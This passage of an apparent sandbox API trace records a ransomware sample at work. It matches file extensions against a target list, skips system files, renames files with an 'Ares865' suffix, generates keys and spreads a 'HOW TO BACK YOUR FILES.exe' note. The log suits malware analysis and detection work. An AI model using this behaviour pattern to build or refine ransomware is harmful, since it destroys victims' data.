(lpString="vis") returned 3 [0057.988] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0057.988] lstrlenW (lpString="vpd") returned 3 [0057.988] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0057.988] lstrlenW (lpString="vvv") returned 3 [0057.988] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0057.988] lstrlenW (lpString="wdb") returned 3 [0057.988] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0057.988] lstrlenW (lpString="wmdb") returned 4 [0057.988] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0057.988] lstrlenW (lpString="wrk") returned 3 [0057.988] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0057.988] lstrlenW (lpString="xdb") returned 3 [0057.988] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0057.988] lstrlenW (lpString="xld") returned 3 [0057.988] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0057.988] lstrlenW (lpString="xmlff") returned 5 [0057.988] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0057.988] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Videos\\desktop.ini.Ares865") returned 48 [0057.988] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Videos\\desktop.ini" (normalized: "c:\\users\\default user\\videos\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Videos\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\videos\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0057.989] CreateFileW (lpFileName="C:\\Users\\Default User\\Videos\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\videos\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0057.989] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=504) returned 1 [0057.990] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0057.991] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0057.992] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0057.992] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0057.992] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0057.992] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0057.993] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x500, lpName=0x0) returned 0x154 [0058.002] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x500) returned 0x190000 [0058.003] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0058.004] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.004] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0058.004] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0058.004] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0058.004] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.004] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.004] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.004] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.004] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.004] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.004] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.004] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.004] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.005] CloseHandle (hObject=0x154) returned 1 [0058.005] CloseHandle (hObject=0x15c) returned 1 [0058.006] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.006] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0058.006] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.006] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49b82fc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49b82fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0058.006] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0058.006] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49b82fc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49b82fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0058.006] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0058.006] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d23a8 [0058.006] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Templates", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Templates") returned="C:\\Users\\Default User\\Templates" [0058.006] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6558 | out: hHeap=0x2b0000) returned 1 [0058.006] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0058.006] lstrlenW (lpString="C:\\Users\\Default User\\Templates") returned 31 [0058.006] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Templates" | out: lpString1="C:\\Users\\Default User\\Templates") returned="C:\\Users\\Default User\\Templates" [0058.006] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.006] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Templates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\templates\\how to back your files.exe"), bFailIfExists=1) returned 0 [0058.007] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0058.007] GetLastError () returned 0x0 [0058.007] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0058.007] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0058.007] CloseHandle (hObject=0x118) returned 1 [0058.007] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0058.007] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.007] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Templates\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49c67800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49c67800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0058.008] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.008] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.008] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.008] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49c67800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49c67800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.008] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.008] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0058.008] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.008] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.008] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x49c67800, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49c67800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0058.008] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0058.008] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x49c67800, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49c67800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0058.008] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0058.008] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2388 [0058.008] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Start Menu", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Start Menu") returned="C:\\Users\\Default User\\Start Menu" [0058.008] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee9c0 | out: hHeap=0x2b0000) returned 1 [0058.008] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0058.008] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu") returned 32 [0058.008] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Start Menu" | out: lpString1="C:\\Users\\Default User\\Start Menu") returned="C:\\Users\\Default User\\Start Menu" [0058.008] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.008] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\start menu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0058.009] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0058.009] GetLastError () returned 0x0 [0058.009] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0058.009] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0058.009] CloseHandle (hObject=0x118) returned 1 [0058.009] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0058.009] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.009] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Start Menu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49cb3ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49cb3ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0058.010] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.010] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.010] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.010] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49cb3ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49cb3ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.010] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.010] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0058.010] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.010] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.010] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x63dece0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0058.010] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.010] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0058.010] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0058.010] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0058.010] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0058.010] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0058.010] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0058.010] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0058.010] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0058.010] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0058.010] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0058.010] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0058.010] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0058.011] lstrlenW (lpString="desktop.ini") returned 11 [0058.011] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\*") returned 34 [0058.011] lstrcpyW (in: lpString1=0x2cce442, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0058.011] lstrlenW (lpString="desktop.ini") returned 11 [0058.011] lstrlenW (lpString="Ares865") returned 7 [0058.011] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0058.011] lstrlenW (lpString=".dll") returned 4 [0058.011] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0058.011] lstrlenW (lpString=".lnk") returned 4 [0058.011] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0058.011] lstrlenW (lpString=".ini") returned 4 [0058.011] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0058.011] lstrlenW (lpString=".sys") returned 4 [0058.011] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0058.011] lstrlenW (lpString="desktop.ini") returned 11 [0058.011] lstrlenW (lpString="bak") returned 3 [0058.011] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0058.011] lstrlenW (lpString="ba_") returned 3 [0058.011] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0058.011] lstrlenW (lpString="dbb") returned 3 [0058.011] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0058.011] lstrlenW (lpString="vmdk") returned 4 [0058.011] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0058.011] lstrlenW (lpString="rar") returned 3 [0058.011] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0058.011] lstrlenW (lpString="zip") returned 3 [0058.011] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0058.011] lstrlenW (lpString="tgz") returned 3 [0058.011] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0058.011] lstrlenW (lpString="vbox") returned 4 [0058.011] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0058.011] lstrlenW (lpString="vdi") returned 3 [0058.011] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0058.011] lstrlenW (lpString="vhd") returned 3 [0058.011] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0058.011] lstrlenW (lpString="vhdx") returned 4 [0058.011] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0058.011] lstrlenW (lpString="avhd") returned 4 [0058.012] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0058.012] lstrlenW (lpString="db") returned 2 [0058.012] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0058.012] lstrlenW (lpString="db2") returned 3 [0058.012] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0058.012] lstrlenW (lpString="db3") returned 3 [0058.012] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0058.012] lstrlenW (lpString="dbf") returned 3 [0058.012] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0058.012] lstrlenW (lpString="mdf") returned 3 [0058.012] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0058.012] lstrlenW (lpString="mdb") returned 3 [0058.012] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0058.012] lstrlenW (lpString="sql") returned 3 [0058.012] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0058.012] lstrlenW (lpString="sqlite") returned 6 [0058.012] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0058.012] lstrlenW (lpString="sqlite3") returned 7 [0058.012] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0058.012] lstrlenW (lpString="sqlitedb") returned 8 [0058.012] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0058.012] lstrlenW (lpString="xml") returned 3 [0058.012] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0058.012] lstrlenW (lpString="$er") returned 3 [0058.012] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0058.012] lstrlenW (lpString="4dd") returned 3 [0058.012] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0058.012] lstrlenW (lpString="4dl") returned 3 [0058.012] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0058.012] lstrlenW (lpString="^^^") returned 3 [0058.012] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0058.012] lstrlenW (lpString="abs") returned 3 [0058.012] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0058.012] lstrlenW (lpString="abx") returned 3 [0058.012] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0058.012] lstrlenW (lpString="accdb") returned 5 [0058.012] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0058.012] lstrlenW (lpString="accdc") returned 5 [0058.013] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0058.013] lstrlenW (lpString="accde") returned 5 [0058.013] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0058.013] lstrlenW (lpString="accdr") returned 5 [0058.013] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0058.013] lstrlenW (lpString="accdt") returned 5 [0058.013] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0058.013] lstrlenW (lpString="accdw") returned 5 [0058.013] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0058.013] lstrlenW (lpString="accft") returned 5 [0058.013] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0058.013] lstrlenW (lpString="adb") returned 3 [0058.013] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0058.013] lstrlenW (lpString="adb") returned 3 [0058.013] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0058.013] lstrlenW (lpString="ade") returned 3 [0058.013] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0058.013] lstrlenW (lpString="adf") returned 3 [0058.013] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0058.013] lstrlenW (lpString="adn") returned 3 [0058.013] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0058.013] lstrlenW (lpString="adp") returned 3 [0058.013] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0058.013] lstrlenW (lpString="alf") returned 3 [0058.013] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0058.013] lstrlenW (lpString="ask") returned 3 [0058.013] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0058.013] lstrlenW (lpString="btr") returned 3 [0058.013] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0058.013] lstrlenW (lpString="cat") returned 3 [0058.013] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0058.013] lstrlenW (lpString="cdb") returned 3 [0058.013] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0058.013] lstrlenW (lpString="ckp") returned 3 [0058.013] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0058.013] lstrlenW (lpString="cma") returned 3 [0058.013] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0058.013] lstrlenW (lpString="cpd") returned 3 [0058.013] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0058.014] lstrlenW (lpString="dacpac") returned 6 [0058.014] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0058.014] lstrlenW (lpString="dad") returned 3 [0058.014] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0058.014] lstrlenW (lpString="dadiagrams") returned 10 [0058.014] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0058.014] lstrlenW (lpString="daschema") returned 8 [0058.014] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0058.014] lstrlenW (lpString="db-journal") returned 10 [0058.014] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0058.014] lstrlenW (lpString="db-shm") returned 6 [0058.014] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0058.014] lstrlenW (lpString="db-wal") returned 6 [0058.014] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0058.014] lstrlenW (lpString="dbc") returned 3 [0058.014] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0058.014] lstrlenW (lpString="dbs") returned 3 [0058.014] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0058.014] lstrlenW (lpString="dbt") returned 3 [0058.014] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0058.014] lstrlenW (lpString="dbv") returned 3 [0058.014] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0058.014] lstrlenW (lpString="dbx") returned 3 [0058.014] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0058.014] lstrlenW (lpString="dcb") returned 3 [0058.014] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0058.014] lstrlenW (lpString="dct") returned 3 [0058.014] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0058.014] lstrlenW (lpString="dcx") returned 3 [0058.014] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0058.014] lstrlenW (lpString="ddl") returned 3 [0058.014] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0058.014] lstrlenW (lpString="dlis") returned 4 [0058.014] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0058.014] lstrlenW (lpString="dp1") returned 3 [0058.014] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0058.015] lstrlenW (lpString="dqy") returned 3 [0058.015] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0058.015] lstrlenW (lpString="dsk") returned 3 [0058.015] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0058.015] lstrlenW (lpString="dsn") returned 3 [0058.015] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0058.015] lstrlenW (lpString="dtsx") returned 4 [0058.015] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0058.015] lstrlenW (lpString="dxl") returned 3 [0058.015] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0058.015] lstrlenW (lpString="eco") returned 3 [0058.015] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0058.015] lstrlenW (lpString="ecx") returned 3 [0058.015] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0058.015] lstrlenW (lpString="edb") returned 3 [0058.015] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 